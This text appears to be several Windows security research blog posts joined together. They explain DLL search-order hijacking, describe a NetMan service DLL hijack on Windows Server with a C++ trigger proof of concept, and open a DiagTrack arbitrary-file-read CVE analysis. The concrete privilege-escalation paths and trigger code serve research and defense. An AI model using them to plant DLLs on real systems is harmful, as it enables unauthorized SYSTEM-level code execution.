Note: in this context, the term “Known DLL” has a very specific meaning. These DLLs are listed in the HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs registry key and are guaranteed to be loaded from the System folder.

I won’t bore you with the theory. Rather, I’ll illustrate this search order with some examples based on the following source code. The following program uses the first command line argument as the name of a library to load with LoadLibrary().

HMODULE hModule = LoadLibrary(argv[1]);
if (hModule) {
    wprintf(L"LoadLibrary() OK\n");
    FreeLibrary(hModule);
} else {
    wprintf(L"LoadLibrary() KO - Error: %d\n", GetLastError());
}

Scenario 1: loading a DLL which exists in the application’s directory.

The program finds the DLL in its directory C:\MyCustomApp, that’s the first location in the search order so the library is loaded successfully. Everything is fine. :ok_hand:

Scenario 2: loading a Windows DLL, dbghelp.dll for example.

The program first tries to load the DLL from C:\MyCustomApp, the application’s directory, and doesn’t find it there. Therefore, it tries to load it from the system directory C:\Windows\System32, where this library is actually located.

We can see a potential issue here. What if the C:\MyCustomApp directory is configured with incorrect permissions and allows any user to add files? You guessed it, a malicious version of the DLL could be planted in this directory, allowing a local attacker to execute arbitrary code in the context of any other user who would run this application. Although that’s DLL search order hijacking, this first variant is also sometimes rightly or wrongly called DLL Sideloading. It’s mostly used by malwares but it can also be used for privilege escalation (see my article about DLL Proxying).

Note: in theory DLL Sideloading has a specific meaning. According to MITRE: “Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL.

Scenario 3: loading a nonexistent DLL

If the target DLL doesn’t exist, the program continues its search in the other Windows directories. If it can’t find it there, it tries to load it from the current directory. If it still can’t find it, it eventually searches for it in all the directories that are listed in the %PATH% environment variable.

We can see that a lot of DLL hijacking opportunities arise there. If any of the %PATH% directories is writable, then a malicious version of the DLL could be planted and would be loaded by the application whenever it’s executed. This is another variant which is sometimes called Ghost DLL injection or Phantom DLL hijacking.

Scenario 4: loading a nonexistent DLL as NT AUTHORITY\SYSTEM

With this last scenario, we are slowly but surely approaching the objective. In the previous examples, I ran the executable as a low-privileged user so that’s not representative of a privilege escalation scenario. Let’s remediate this and run the last command as NT AUTHORITY\SYSTEM this time.

The exact same search order applies to NT AUTHORITY\SYSTEM as well and that’s completely normal. There is a slight difference though. The last directory in the search is different. With the low-privileged user it was C:\Users\Lab-User\AppData\Local\Microsoft\WindowsApps whereas it’s now C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\WindowsApps. This difference is due to a per-user path that was added starting with Windows 10: %USERPROFILE%\AppData\Local\Microsoft\WindowsApps, where %USERPROFILE% resolves to the path of the user’s home folder.

Anyway, by default, all these folders are configured with proper permissions. So, low-privileged users wouldn’t be able to plant a malicious DLL, preventing them from hijacking the execution flow of a service running as NT AUTHORITY\SYSTEM for example. With this demonstration, I hope that it’s now clear why DLL hijacking is not a vulnerability.

OK, if DLL hijacking isn’t a vulnerability, why all this fuss? :confused:

Well, as I said before, DLL hijacking is just a core concept, an exploitation technique if you will. It’s just a means to an end. The end goal is either local privilege escalation or persistence (or even AV evasion) in most cases. Though, the means may differ a lot depending on your perspective. Based on my own experience, I know that this perspective generally differs between pentesters and security researchers, hence the potential confusion. So, I’ll highlight two real-life examples in the next parts.

DLL Hijacking From a Security Researcher’s Perspective

First of all, as a Windows bug hunter, if you want to find privilege escalation vulnerabilities on the operating system itself, you’ll often want to start from a blank page, with a clean installation of Windows. The objective is to prevent side-effects that could be caused by the installation of third-party applications. That’s already a big difference between a researcher and a pentester.

Previously, I said that a default installation of Windows is not vulnerable to DLL hijacking because all the directories that are used in the DLL search are configured with proper permissions so, how this technique can still be useful?

It turns out this technique comes in very handy when it comes to privileged file operations abuse for example, especially arbitrary file write. Let’s say that you found a vulnerability in a service that allows you to move any file you own to any location on the filesystem in the context of NT AUTHORITY\SYSTEM. That’s cool but that’s somewhat limited. What you really want to achieve is arbitrary code execution as NT AUTHORITY\SYSTEM. At this point, DLL hijacking is the missing piece that completes the puzzle.

An arbitrary file write vulnerability opens up many opportunities for DLL hijacking because you are not limited to the %PATH% directories (scenario #3), you could also consider hijacking a DLL in an application’s directory (scenario #2) or even in C:\Winows\System32 if it doesn’t exist there. Both DLL Sideloading and Phantom DLL Hijacking techniques can then be used.

If you search for DLL Sideloading opportunities using Process Monitor on a default installation of Windows, you’ll find a lot of them. Typically, any program which is not installed in C:\Windows\System32 and tries to load a DLL from this folder without specifying its full path will fall into this category.

Enough with the theory, let’s take a real-life example! On the below screenshot, you can see that the WMI service loads the wbemcomn.dll library on startup:

The first result is NAME NOT FOUND. That’s totally normal because wbemcomn.dll is a system library, its actual location is C:\Windows\System32\wbemcomn.dll. Though wmiprvse.exe tries to load it from C:\Windows\System32\wbem because this is the directory where it is installed.

Therefore, provided that you found an arbitary file write vulnerability, you could plant a malicious version of wbemcomn.dll in C:\Windows\System32\wbem. After a machine reboot, your DLL would be loaded by the service as NT AUTHORITY\SYSTEM. Though in practice you wouldn’t rely on this particular DLL hijacking opportunity in your exploit for two major reasons:

  • A reboot is required - Let’s say you found a vulnerability that allows you to move a file to an arbitrary location as SYSTEM. Ending you exploit chain with a machine reboot after having successfully planted your DLL would be a shame. You’d rather search for a DLL hijacking you can trigger on demand as a normal user.
  • Denial of Service - Let’s say that you finally decided to plant your DLL in the wbem folder because you didn’t find a better candidate. After a machine reboot, your DLL is properly loaded by the service and you get your arbitary code execution as SYSTEM. That’s cool but what about the service? Congratulations, you’ve just crashed it because it wasn’t able to import its required dependencies. Again that’s a shame. One could argue that you could craft a Proxy DLL in order to address this issue. Though in practice this would add to your exploit development workload so you want to avoid that as far as possible

This is only one example of DLL Sideloading. There is a ton of similar opportunities on a default installation of Windows. That’s why, security researchers often say that DLL hijacking on Windows is very common and widespread. From their perspective, they think of DLL hijacking in its entirety. However, with the two previous points in mind, you can see that it’s not that simple in the end. Although DLL hijacking is widespread, finding the perfect candidate for your exploit can easily become a headache. That’s why exploits such as the DiagHub technique by James Forshaw are very interesting. This specific technique is now patched but it met all the criteria back then:

  • It could be triggered by a normal user through RPC and you could even choose the name of the DLL you wanted to load. As long as it was in the System32 folder, it would be loaded by the service.
  • You could safely execute your own code without risking a service crash.
  • On top of that, you didn’t have to write your code in DllMain().

Microsoft finally prevented this exploit by enforcing code signing. In other words, only Microsoft-signed libraries can now be loaded using this trick. Later on, I found another technique that is not as good as this one but still meets almost all of the above criteria - Weaponizing Privileged File Writes with the USO Service, but I digress…

That’s it for DLL hijacking in the context of Windows security research. What about pentesters now?

DLL Hijacking From a Pentester’s Perspective

In the context of a pentest, the initial conditions are usually very different. You are given an environment to compromise and you have to adpat based on what you find along the way. Finding a 0-day vulnerability or leveraging the last privilege escalation exploit that was released publicly is usually the option of last resort. The first things you’re looking for are system misconfigurations. Based on my own experience, I’d say that it probably represents 80% of the job.

Security issues caused by misconfigurations are common in corporate environments. That is to some extent quite understandable because installing an operating system without any additional software is pretty useless. And sometimes, these third-party applications introduce vulnerabilities either because they are not installed correctly or they are themselves vulnerable.

Based on what I explained previously, I’ll discuss the two most common DLL hijacking scenarios you’ll face. Now for the setup, here is a common mistake I see very often in corporate environments: a third-party application is installed at the root of the main partition (C:\) or is installed on a seperate partition (D:\ for example).

If you don’t already know that, folders that are created at the root of a partition are granted permissive rights. They allow any “Authenticated User” to create files and folders in them. These permissions are then inherited by subdirectories by default. Therefore, if the program installer doesn’t take care of that or if the administrator doesn’t check them, there is a high chance that the application’s folder is vulnerable.

With this in mind, here are the two most common scenarios you’ll face:

  1. The program installer created a service which runs as NT AUTHORITY\SYSTEM and executes a program from this directory. In this example, we consider that the permissions of the executable itself are properly configured though. In this case, there is a high chance that it is vulnerable to DLL Sideloading. A local attacker could plant a Windows DLL that is used by this service in the application’s folder.
  2. The program installer added the application’s directory to the system’s %PATH%. This case is a bit different. You could still use DLL Sideloading in order to execute code in the context of any other user who would run this application but you could also achieve privilege escalation to SYSTEM. What you need in this case is Ghost DLL Hijacking because, as I explained before, a nonexistent DLL lookup will ultimately end up in the %PATH% directories.

From my experience, this second scenario is by far the most common one. So, assuming that you find yourself in such situation, what would you need? Well, you’d need to find a privileged process that tries to load a DLL from this unsecure folder. The most common place to look for this kind of opportunity is Windows services.

But then, what are the criteria for finding the perfect candidate? They can be summarized in these three points:

  • It tries to load a nonexistent DLL without specifying its full path.
  • It doesn’t use a safe DLL search order.
  • It runs as NT AUTHORITY\SYSTEM. Actually it’s not strictly required but I will consider only this case for simplicity. This particular subject will be discussed in an upcoming article. :wink:

On Windows 10 (workstation), services that match these criteria have almost disappeared. Therefore, I often say that DLL hijacking isn’t that common nowadays on Windows 10. That’s because when I think of it I refer to missing DLLs which are loaded from the %PATH% directories by services running as highly privileged account, which is only one variant of DLL hijacking. Nevertheless there are still a few of these services. One of them is the Task Scheduler, as explained in this blog post. This service tries to load the missing WptsExtensions.dll DLL upon startup.

As you can see on the above screenshot, the service tried to load this DLL from C:\MyCustomApp because this directory was added to the system’s %PATH%. Since this directory is configured with weak permissions, any local user can therefore plant a malicious version of this DLL and thus execute code in the context of this service after a machine reboot.

Note: once again, the %PATH% is an environment variable so it varies depending on the user profile. As a consequence, the %PATH% of the NT AUTHORITY\SYSTEM account is often different from the %PATH% of a typical user account.

Though, you have to be very careful with this particular DLL hijacking if you want to exploit it during a pentest. Indeed, when this DLL is loaded by the service, it’s not freed so you won’t be able to remove the file. One solution is to stop the service as soon as you get your SYSTEM shell, then remove the file and finally start the service again.

Note: starting/stopping the Task Scheduler service requires SYSTEM privileges.

This example applies to Windows 10 workstation but what about Windows servers? Well I won’t discuss this here because I already did that in my previous post: Windows Server 2008R2-2019 NetMan DLL Hijacking. On all versions of Windows Server, starting with 2008 R2, the NetMan service is prone to DLL hijacking in the %PATH% directories because of the missing WLAN API. So, if you find yourself in the situation I just described, you could trigger this service in order to load your malicious DLL as SYSTEM, very convenient.

How to prevent DLL Hijacking?

Hopefully, I made it clear that, whatever the situation, DLL hijacking isn’t a vulnerability. It’s just an exploitation technique for getting code execution in the context of an application or a service for example. An exploitation technique on its own is useless though, what you need is a vulnerability such as weak folder permissions or a privileged file operation abuse.

  • Weak folder permissions - This issue can be caused by the installation of a third-party application. The installer should take care of that but that’s not always the case so system administrators should pay extra attention to this issue.
  • Privileged file operation abuse - This issue is due to a flaw in the design of the application. In this case, developpers should review the code in order to prevent such operation on files and folders that can be controlled by normal users or implement impersonation when possible.

Now, let’s say that the permissions of the application’s folder are properly set and that your code is clean, but you want to go the extra mile. There are still a few things you can do in order to reduce the risk of DLL hijacking in the %PATH% directories.

You’ve probably noticed that I used the simple LoadLibrary() function in my example but I didn’t say anything about the second option: LoadLibraryEx(). As a reminder, here is its prototype:

HMODULE LoadLibraryEx(LPCSTR lpLibFileName, HANDLE hFile, DWORD dwFlags);

The first parameter is still the name (or the path) of the DLL but there are two other arguments. According to the documentation, the second one - hFile - is reserved and should be set to NULL. The third argument, however, allows you to specify some flags that will affect the behavior of the function. In our case, the three most interesting flags are:

  • LOAD_LIBRARY_SEARCH_APPLICATION_DIR - If this value is used, the application’s installation directory is searched for the DLL and its dependencies. Directories in the standard search path are not searched.

Indeed, if this flag is used, the search is limited to C:\MyCustomApp.

  • LOAD_LIBRARY_SEARCH_SYSTEM32 - If this value is used, %windows%\system32 is searched for the DLL and its dependencies. Directories in the standard search path are not searched.

Indeed, if this flag is used, the search is limited to C:\Windows\System32.

  • LOAD_LIBRARY_SEARCH_USER_DIRS - If this value is used, directories added using the AddDllDirectory() or the SetDllDirectory() function are searched for the DLL and its dependencies.

Enough with the theory, let’s check a real-life example. :slightly_smiling_face:

You probably know or you’ve probably heard about the IKEEXT DLL hijacking, that was originally published here in 2012 as far as I can tell. Starting with Windows Vista and up to Windows 8, the IKEEXT service loaded the missing wlbsctrl.dll library upon startup without specifying its full path and without using a safe DLL search order. Here is what it looked like back then:

Of course, the researcher who initially reported this to Microsoft was given the same usual answer:

Microsoft has thoroughly investigated the claim and found that this is not a product vulnerability. In the scenario in question, the default security configuration of the system has been weakened by a third-party application. Customers who are concerned with this situation can remove the directory in question from PATH or restrict access to the third-party’s application directory to better protect themselves against these scenarios.

This is the official answer but then, starting with Windows 8.1, this DLL hijacking magically disappeared. Have you ever wondered how and why? Well, let me tell you that IKEEXT still tries to load this missing DLL, even in the latest version of Windows 10. But why don’t we talk about it anymore? First things first, here is what it looks like now on Windows 10:

See? The service tries to load the DLL from C:\Windows\System32, doesn’t find it and then stops. Do you recognize this behavior? :smirk: At this point, and based on what I’ve explained so far, you probably see where I’m going with this.

Let’s take a look at the two versions of the ikeext.dll file…

Of course, there is nothing magical about this. It turns out that Microsoft just silently patched this particular DLL hijacking by modifying the code of ikeext.dll. LoadLibraryEx() is now called instead of LoadLibrary() with the flag LOAD_LIBRARY_SEARCH_SYSTEM32, thus restricting the search to %windir%\System32.

LoadLibraryW(L"wlbsctrl.dll");                                          // Windows 7
LoadLibraryExW(L"wlbsctrl.dll", NULL, LOAD_LIBRARY_SEARCH_SYSTEM32);    // Windows 10

What is the cost of this change: one line of code, yes ONLY ONE LINE OF CODE!!! :expressionless:

With that in mind, I want you to think about a particular communication from Microsoft Security Response Center (MSRC). In a blog post, entitled Triaging a DLL planting vulnerability, they explicitly define what is considered a vulnerability and what is not:

Did you read that? Microsoft won’t address DLL hijacking scenarios involving %PATH% directories. I’ll let you draw your own conclusions from this… :roll_eyes:

Conclusion

In the end, DLL hijacking (in the %PATH% directories) is not a vulnerability. It’s what Microsoft keeps replying over and over again to people who report them. OK, we get that and now what?

In this post, I discussed two versions of this problem:

  • DLL sideloading - If the permissions of an application’s folder are not properly configured, that’s the responsibility of this application only and, most of the time, the impact is limited to this application. So, there’s nothing special to say about it.
  • DLL hijacking in the %PATH% directories - Again, if the permissions of an application’s folder are not properly configured, that’s the responsibility of this application. However, if it adds itself to the system’s %PATH%, that’s another story. In this case, the entire system is put at risk. Any Windows service that attempts to load a missing DLL without using a secure DLL search order can then be leveraged for privilege escalation. Is this a normal situation? I don’t think so.

When you know that this second scenario can easily be prevented simply by changing one line of code, I find it really hard to accept Microsoft’s answer to this issue. It’s even harder to accept considering that they patch them silently in the end. Unfortunately, I know that there are some people who keep relaying Microsoft’s argument blindly. The problem is that this leads us nowhere. Do we want to improve security or do we just want to spend our time figuring out who’s responsible for what?

In my opinion, a honest and constructive reply to people who report these issues would be something like: “Thank you for your report, we don’t consider this a critical or important security issue but we will address this in a future public release”. Perhaps I’m a bit naive and my point of view is biased because I don’t have the big picture. I don’t know. Anyway, I’ll conclude this post with an approximate translation of a quote from a French humorist: “If you’re absolutely one hundred percent sure about something, there’s a high chance you are wrong.

Links & Resources

Windows Server 2008R2-2019 NetMan DLL Hijacking

What if I told you that all editions of Windows Server, from 2008R2 to 2019, are prone to a DLL Hijacking in the %PATH% directories? What if I also told you that the impacted service runs as NT AUTHORITY\SYSTEM and that the DLL loading can be triggered by a normal user, on demand, and without the need of a machine reboot? Provided that you found some %PATH% directories configured with weak permissions, this would probably be the most straightforward privilege escalation technique I know. I don’t know why there hasn’t been any publication about this yet. Anyway, I’ll try to fill this gap.

Foreword

To start things off, I probably don’t need to clarify this but DLL hijacking is not considered as a vulnerability by Microsoft (source). I tend to agree with this statement because, by default, even if a DLL is loaded from the %PATH% directories by a process running with higher privileges, this behavior cannot be exploited by a normal user. Though in practice, and especially in corporate environments, it’s quite common to see third-party applications configured with weak folder permissions. In addition, if they add themselves to the system’s %PATH%, the entire system is then put at risk. My personal opinion on the subject is that Microsoft should prevent these uncontrolled DLL loadings as far as possible in order to prevent a minor configuration issue affecting a single application from becoming a privilege escalation attack vector with a way higher impact.

Back to Basics: Searching for DLL Hijacking Using Procmon

This discovery is the unexpected result of some research I was doing on Windows 2008 R2. Although the system is no longer supported, it’s still widespread in corporate networks and, I was looking for the easiest way of exploiting binary planting through my CVE-2020-0668 exploit. I’ve done a lot of research on Windows 10 Worsktation during the past few months and working back on Windows 7/2008 R2 required me to forget about some techniques I’ve learned and to restart from the beginning. My original problem was: how to easily exploit arbitrary files writes on Windows 2008 R2?

My first instinct was to start with the IKEEXT service. On a default installation of Windows 2008 R2, this service is stopped, and it tries to load the missing wlbsctrl.dll library whenever it’s started. A normal user can easily trigger this service simply by attempting to initiate a dummy VPN connection. However, starting it only once affects its start mode, it goes from DEMAND_START to AUTOMATIC. Leveraging this service under such circumstances would therefore require a machine reboot, which makes it a far less interesting target. So, I had to look for other ways. I also considered the different DLL hijacking opportunities documented by Frédéric Bourla in his article entitled “A few binary plating 0-days for Windows” but they are either not easy to trigger or appear quite randomly.

I decided to begin my research process with firing up Process Monitor and checking for DLL loading events failing with a NAME NOT FOUND error. In the context of an arbitrary file write exploit, the research doesn’t have to be limited to the %PATH% folders so this yields a lot of results! To refine the research, I therefore added a constraint. I wanted to filter out processes which try to load a DLL from the C:\Windows\System32\ folder and then find it in another Windows folder, especially if they need it to function properly. The objective is to avoid a Denial of Service as far as possible.

I considered 3 DLL hijacking cases:

  • A program loads a DLL which doesn’t exist in C:\Windows\System32\ but exists in another Windows directory, C:\Windows\System\ for example. Since the C:\Windows\System32\ folder has a higher priority, this could be a valid candidate.
  • A program loads a non-existing DLL but uses a safe DLL search order. Therefore, it only tries to load it from the C:\Windows\System32\ folder for example.
  • A program loads a non-existing DLL and uses an unrestricted DLL search order.

The first case might lead to Denial of Service so I left it aside. The second case is interesting but can be a bit difficult to spot amongst all the results returned by Procmon. The third case is definetly the most interesting one. If the DLL doesn’t exist, the risk of causing a Denial of Service when hijacking it is reduced and it’s also easy to spot in Procmon.

To do so, I didn’t add a new filter in Process Monitor. Instead, I simply added a rule which highlights all the paths containing WindowsPowerShell. Why this particular keyword, you may ask. On all (modern) versions of Windows, C:\Windows\System32\WindowsPowerShell\v1.0\ is part of the default %PATH% folders. Therefore, whenever you see a program trying to load a DLL from this folder, it most probably means that it is prone to DLL Hijacking.

I then tried to start/stop each service or scheduled task I could. And, after having spent a few hours staring at Procmon’s output, I finally saw this:

Wait, what?! Is this really what I think it is? :astonished: Is this a non-existing DLL being loaded by a service running as NT AUTHORITY\SYSTEM? My first thought was: “if wlanhlp.dll is a hijackable DLL, I should already know about it, I must have made a mistake somewhere or I must have installed some third-party app causing this”. But then I remembered. Firstly, I’m using a fresh install of Windows Server 2008 R2 in a dedicated VM. The only third party application is “VMware Tools”. Secondly, all the research I’ve done so far was mostly on Worstation editions of Windows because it’s often more convenient. Could it be the reason why I saw this event only now?

Fortunately, I have another VM with Windows 7 installed so I quickly checked. It turns out that this DLL exists on a Workstation edition!

If you think about it, if wlanhlp.dll is really related to Wlan capabilities as its name implies, it would make sense. The Wlan API is only available on Workstation editions by default and must be installed as an additional component on Server editions. Anyway, I must be on to something…

NetMan and the Missing Wlan API

Let’s start by looking at the properties of the event in Procmon and learn more about the service.

The process runs as NT AUTHORITY\SYSTEM, that’s some good news for us. It has the PID 972 so let’s check the corresponding service in the Task Manager.

Three services run inside this process. Looking at the Stack Trace of the event in Procmon, we should be able to determine the name of the one which tried to load this DLL.

We can see an occurrence of netman.dll so the corresponding service must be NetMan (a.k.a. Network Connections). That’s one problem solved. If we take a closer look at this Stack Trace, we also notice several lines containing references to RPCRT4.dll or ole32.dll. That’s a good sign. It means that this event was most probably triggered through RPC/COM. If so, there is a chance we can also trigger this event as a normal user with a few lines of code but I’m getting ahead of myself.

This DLL hijacking opportunity is due to the fact that the Wlan API is not installed by default on a server edition of Windows 6.1 (7 / 2008 R2). The question is: does the same principle apply to other versions of Windows? :thinking:

Luckily, I use quite a lot of virtual machines for my research and I had instances of Windows Server 2012 R2 and 2019 already set up so it didn’t take long to verify.

On Windows Server 2012 R2, wlanhlp.dll doesn’t show up in Procmon. However wlanapi.dll does instead. Looking at the details of the event, it turns out that it is identical. This means that Windows 6.3 (8.1 / 2012 R2) is also “affected”.

Ok, this version of Windows is pretty old now, Windows 2019 cannot be affected by the same issue, right? Let’s check this out…

The exact same behavior occurs on Windows Server 2019 as well! :smirk: I ended up checking this on all possible versions of Windows Server from 2008 to 2019. I won’t bore you with the details, all the versions are prone to this DLL hijacking. The only one which I couldn’t test thoroughly was Server 2008, I wasn’t able to reproduce the issue on this one.

How to Trigger this DLL Hijacking Event on Demand?

Let’s summarize the situation. On all versions of Windows Server, the NetMan service, which runs as NT AUTHORITY\SYSTEM, tries to load the missing wlanhlp.dll or wlanapi.dll DLL without using a safe DLL search order. Therefore it ends up trying to load this DLL from the directories which are listed in the system’s %PATH% environement variable. That’s a great start I’d say! :slightly_smiling_face:

The next step is to figure out if we can trigger this event as a normal user. I already mentionned that this behavior was due to some RPC/COM events but it doesn’t necessarily mean that we can trigger it. This event could also be the result of two services communicating with each other through RPC.

Anyway, let’s hope for the best and start by checking the Stack Trace once again but, this time, using an instance of Procmon configured to use the public symbols provided by Microsoft. To do so, I switched to the Windows 10 VM I use for security research.

We can see that the CLanConnection::GetProperties() method is called here. In other events, the CLanConnection::GetPropertiesEx() method is called instead. Let’s see if we can find these methods by inspecting the COM objects exposed by NetMan using OleViewDotNet.

Simply based on the name of the class, the LAN Connection Class seems like a good candidate. So, I created an instance of this class and checked the details of the INetConnection interface.

Here it is! We can see the CLanConnection::GetProperties() method. We’re getting close! :ok_hand:

At this point, I was thinking that all of this looked too good to be true. First, I saw this DLL hijacking which I had never seen before. Then, I saw that it was triggered by an RPC/COM event. Finally, finding it with OleViewDotNet was trivial. There had to be a catch! Though, only one problem could arise now: restrictive permissions on the COM object.

COM objects are securable too and they have ACLs which define who is allowed to use them. So, we need to check this before going any further.

When I first saw Administrators and NT AUTHORITY\..., I thought for a second, “crap, this can only be triggered by high-privileged accounts”. And then I saw NT AUTHORITY\INTERACTIVE, phew… :sweat_smile:

What this actually means is that this COM object can be used by normal users only if they are authenticated using an interactive session. More specifically, you’d need to logon locally on the server. Not very useful, right?! Well, it turns out that when you connect through RDP (this includes VDI), you get an interactive session as well so, under these circumstances, this COM object could be used by a normal user. Otherwise, if you tried to use it in a WinRM session for example, you’d get an “Access denied” error. That’s not as good as I expected initially but that’s still a seemingly interesting trigger.

The below screenshot shows a command prompt opened in an RDP session on Windows Server 2019.

At this point, the research part is over so let’s write some code! Fortunately, the INetConnection interface is documented (here). This makes things a lot easier. Secondly, while searching how to enumerate the network interfaces with INetConnection->EnumConnections(), I stumbled upon an interesting solution posted by Simon Mourier on StackOverflow here. Yes, I copied some code from StackOverflow, that’s a bit lame, I know… :neutral_face:

Here is my final Proof-of-Concept code:

// https://stackoverflow.com/questions/5917304/how-do-i-detect-a-disabled-network-interface-connection-from-a-windows-applicati/5942359#5942359

#include <iostream>
#include <comdef.h>
#include <netcon.h>

int main()
{
    HRESULT hResult;

    typedef void(__stdcall* LPNcFreeNetconProperties)(NETCON_PROPERTIES* pProps);
    HMODULE hModule = LoadLibrary(L"netshell.dll");
    if (hModule == NULL) { return 1; }
    LPNcFreeNetconProperties NcFreeNetconProperties = (LPNcFreeNetconProperties)GetProcAddress(hModule, "NcFreeNetconProperties");

    hResult = CoInitializeEx(0, COINIT_MULTITHREADED);
    if (SUCCEEDED(hResult))
    {
        INetConnectionManager* pConnectionManager = 0;
        hResult = CoCreateInstance(CLSID_ConnectionManager, 0, CLSCTX_ALL, __uuidof(INetConnectionManager), (void**)&pConnectionManager);
        if (SUCCEEDED(hResult))
        {
            IEnumNetConnection* pEnumConnection = 0;
            hResult = pConnectionManager->EnumConnections(NCME_DEFAULT, &pEnumConnection);
            if (SUCCEEDED(hResult))
            {
                INetConnection* pConnection = 0;
                ULONG count;
                while (pEnumConnection->Next(1, &pConnection, &count) == S_OK)
                {
                    NETCON_PROPERTIES* pConnectionProperties = 0;
                    hResult = pConnection->GetProperties(&pConnectionProperties);
                    if (SUCCEEDED(hResult))
                    {
                        wprintf(L"Interface: %ls\n", pConnectionProperties->pszwName);
                        NcFreeNetconProperties(pConnectionProperties);
                    }
                    else
                        wprintf(L"[-] INetConnection::GetProperties() failed. Error code = 0x%08X (%ls)\n", hResult, _com_error(hResult).ErrorMessage());
                    pConnection->Release();
                }
                pEnumConnection->Release();
            }
            else
                wprintf(L"[-] IEnumNetConnection::EnumConnections() failed. Error code = 0x%08X (%ls)\n", hResult, _com_error(hResult).ErrorMessage());
            pConnectionManager->Release();
        }
        else
            wprintf(L"[-] CoCreateInstance() failed. Error code = 0x%08X (%ls)\n", hResult, _com_error(hResult).ErrorMessage());
        CoUninitialize();
    }
    else
        wprintf(L"[-] CoInitializeEx() failed. Error code = 0x%08X (%ls)\n", hResult, _com_error(hResult).ErrorMessage());
    
    FreeLibrary(hModule);
    wprintf(L"Done\n");
}

The below screenshot shows the final result on Windows Server 2008 R2. As we can see, we can trigger the DLL loading simply by enumerating the Ethernet interfaces of the machine. No need to say that the machine must have at least one Ethernet interface, otherwise this technique doesn’t work. :smile:

The screenshot below shows an attempt to run the same executable as a normal user connected through a remote PowerShell session on Windows Server 2019.

(2020-04-13 update) Dealing with the INTERACTIVE restriction

A couple days after the publication of this blog post, @splinter_code brought to my attention that it was technically possible to spawn an interactive process from a non-interactive one.

Then, I had the chance to exchange a few words with him. It turns out that he developped a tool called RunasCs which implements among other things a generic way for spawning an interactive process. He also took the time to explain to me how it works. This trick involves some Windows internals subtleties which are not commonly well known. I won’t detail the technique here because it would require a dedicated blog post in order to explain everything clearly but I’ll try to give a high-level explanation. I hope we will see a blog post from the author himself soon! :slightly_smiling_face:

To put it simple, you can call CreateProcessWithLogon() in order to create an interactive process. This function requires the name and the password of the target user. The problem is that if you try to do that from a process running in session 0 (where most of the services live), the child process will immediately die. A typical example is when you connect remotely through WinRM. All your commands are executed through a subprocess running in session 0 with your identity.

Why is it a problem? You may ask. The thing is, an interactive process is called this way because it interacts with a desktop, which is a particular securable object in the Windows world. However, in the case of our WinRM process which runs in session 0, you wouldn’t (and you shouldn’t) be allowed to interact with this desktop. What @splinter_code found is that you can edit the ACL of the desktop object in the context of the current process in order to grant the current user access to this object. Child processes will then inherit these permissions and therefore have a desktop to interact with. Really clever!

As you can see on the below screenshot, using this trick, we can spawn an interactive process and therefore run NetManTrigger.exe as if we were logged in locally. :slightly_smiling_face:

Conclusion

Following this analysis, I can say that the NetMan service is probably the most useful target for DLL Hijacking I know about. It comes with a small caveat though. As a normal user you would need an interactive session (RDP / VDI), which makes it quite useless if you’re logged on through a remote PowerShell session for instance. But there is another interesting case, if you’ve compromised another service running as LOCAL SERVICE or NETWORK SERVICE, then you would still be able to trigger the NetMan service to elevate your privileges to SYSTEM.

With this discovery, I also learned a lesson. Focusing your attention and your research on a particular environment may sometimes prevent you from finding interesting stuff, which turns out to be particularly relevant in the context of a pentest.

Last but not least, I integrated this in my Windows Privilege Escalation Check script - PrivescCheck. Depending on the version of Windows, the Invoke-HijackableDllsCheck function will tell you which DLL may potentially be hijacked through the %PATH% directories. Thanks @1mm0rt41 for suggesting the idea! :thumbsup:

Links & Resources

CVE-2020-0863 - An Arbitrary File Read Vulnerability in Windows Diagnostic Tracking Service

Although this vulnerability doesn’t directly result in a full elevation of privileges with code execution as NT AUTHORITY\SYSTEM, it is still quite interesting because of the exploitation “tricks” involved. Diagnostic Tracking Service (a.k.a. Connected User Experiences and Telemetry Service) is probably one of the most controversial Windows features, known for collecting user and system data. Therefore, the fact that I found an Information Disclosure vulnerability in this service is somewhat ironic. The bug allowed a local user to read arbitrary files in the context of NT AUTHORITY\SYSTEM.

DiagTrack RPC Interfaces

This time, I won’t talk about COM but pure old school RPC so, let’s check the interfaces exposed by Diagtrack thanks to RpcView.

We can see that it has quite a few interfaces but we will focus on the one with the ID 4c9dbf19-d39e-4bb9-90ee-8f7179b20283. This one has 37 methods. This makes for quite a large attack surface! :wink:

The vulnerability I found lied in the UtcApi_DownloadLatestSettings procedure… :smirk:

The “UtcApi_DownloadLatestSettings” procedure

RpcView can generate the Interface Definition Language (IDL) file corresponding to the RPC interface. Once compiled, we get the following C function prototype for the UtcApi_DownloadLatestSettings procedure.

long DownloadLatestSettings( 
    /* [in] */ handle_t IDL_handle,
    /* [in] */ long arg_1,
    /* [in] */ long arg_2
)

Unsurprisingly, the first parameter is the RPC binding handle. The two other parameters are yet unknown.

Note: if you’re not familiar with the way RPC interfaces work, here is a very short explanation. While working with Remote Procedure Calls, the first thing you want to do is get a handle on the remote interface using its unique identifier (e.g. 4c9dbf19-d39e-4bb9-90ee-8f7179b20283 here). Only then, you can use this handle to invoke procedures. That’s why you’ll often find a handle_t parameter as the first argument of a procedure. Not all interfaces work like this but most of them do.

After getting a binding handle on the remote interface, I first tried to invoke this function with the following parameters.

RPC_BINDING_HANDLE g_hBinding;
/* ... initialization of the binding handle skipped ... */
HRESULT hRes;
hRes = DownloadLatestSettings(g_hBinding, 1, 1);

And, as usual, I analyzed the file operations running in the background with Process Monitor.

Although the service is running as NT AUTHORITY\SYSTEM, I noticed that it was trying to enumerate XML files located in the following folder, which is owned by the currently logged-on user.

C:\Users\lab-user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Tips\

The user lab-user is the one I use for my tests. It’s a normal user with standard privileges and no admin rights. This operation originated from a call to FindFirstFileW() in diagtrack.dll.

The folder seems to be empty by default so I created a few XML files there.

I ran my test program again and observed the result.

This time, the QueryDirectory operation succeeds and the service reads the content of file1.xml, which is the first XML file present in the directory and copies it into a new file in the C:\ProgramData\Microsoft\Diagnosis\SoftLandingStage\ folder (with the same name).

The same process applies to the two other files: file2.xml, file3.xml.

Finally, all the XML files which were created in C:\ProgramData\[…]\SoftLandingStage are deleted at the end of the process.

Note: I created a specific rule in Procmon to highlight CreateFile operations occurring in the context of a DeleteFile API call.

